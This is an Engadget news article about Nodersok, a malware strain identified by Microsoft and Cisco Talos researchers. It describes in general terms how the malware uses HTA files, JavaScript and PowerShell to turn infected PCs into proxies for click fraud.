Latest in Gear

Image credit:

Malware uses web apps to turn PCs into conduits for attacks

Thousands of systems have been targeted.
Jon Fingas, @jonfingas
September 29, 2019
Share
Tweet
Share

Sponsored Links

sasha85ru via Getty Images

It's not just botnets that can hijack PCs for nefarious ends. Microsoft and Cisco's Talos researchers have identified a new malware strain, Nodersok (or Divergent), that uses web apps to turn systems into proxies for malicious internet traffic. The attack gets victims to run an HTA (HTML application) file through a rogue ad or download, launching a complex sequence of events. JavaScript in the HTA downloads a separate JavaScript file, and that in turn runs a PowerShell command that downloads and runs a whole host of tools, including ones that disable Windows Defender, ask for more control, capture data packets and create the intended proxy.

Crucially, the infection relies on legitimate programs to accomplish its task, whether they're built into Windows or downloaded from third parties. There are no malware programs copied to storage. The approach makes it harder for security teams to research the code and devise countermeasures.

It's not certain who's behind Nodersok. It appears to be meant for everyday criminals rather than hostile countries, however. Cisco believed that i was "primarily designed" for click fraud, or the practice of automatically generating ad clicks to boost revenue from websites. Most targets are typical consumers in Europe and the US rather than corporate or government users.

Both Microsoft and Cisco are keen to tout the ability of their enterprise-grade defense systems to thwart the malware. Most people don't have access to those to those resources, though, and conventional signature-based antivirus software has a much harder time. Nodersok has targeted "thousands of machines" in recent weeks, according to Microsoft, and that might not let up in the near future.

All products recommended by Engadget are selected by our editorial team, independent of our parent company. Some of our stories include affiliate links. If you buy something through one of these links, we may earn an affiliate commission.
Comment
Comments
Share
Tweet
Share

Popular on Engadget

The East Coast is being wracked by internet connection problems

The East Coast is being wracked by internet connection problems

View
‘Babylon 5 Remastered’ now available to buy, or stream on HBO Max

‘Babylon 5 Remastered’ now available to buy, or stream on HBO Max

View
Sony unveils the 50-megapixel A1 with 30 fps shooting and 8K video capability | Engadget

Sony unveils the 50-megapixel A1 with 30 fps shooting and 8K video capability | Engadget

View
iOS 14.4 rolls out with Bluetooth audio monitoring

iOS 14.4 rolls out with Bluetooth audio monitoring

View
Amazon's Alexa Guard Plus security subscription comes to the US

Amazon's Alexa Guard Plus security subscription comes to the US

View

From around the web

Page 1Page 1ear iconeye iconFill 23text filevr